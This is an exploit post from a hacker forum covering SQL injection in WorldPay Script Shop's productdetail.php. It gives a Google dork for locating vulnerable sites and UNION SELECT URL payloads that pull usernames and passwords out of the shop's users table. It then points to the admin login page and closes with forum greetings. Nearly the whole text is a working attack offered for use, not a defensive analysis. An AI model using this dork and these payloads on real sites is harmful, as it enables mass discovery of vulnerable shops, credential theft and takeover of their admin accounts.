21 lines
No EOL
1.2 KiB
Text
21 lines
No EOL
1.2 KiB
Text
============================================
|
|
| WorldPay Script Shop (productdetail) SQL Injection Vulnerability
|
|
============================================
|
|
# (+) Author: Err0R
|
|
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
|
|
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
|
|
=====================================
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
dork (Google): intext:"Powered By WorldPay" inurl:productdetail.php
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
Exploit : Site /path/productdetail.php?id=-231+union+select+1,2,3,4,5--
|
|
And you come the enject ,,
|
|
Demo :-
|
|
User name : http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users<http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users>--
|
|
Password : http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users<http:http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users>--
|
|
admin Login : Site /path/login.php
|
|
=============================================================
|
|
#====GreeTZ===============#
|
|
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
|
|
#and all in My email : ) #
|
|
#======================# |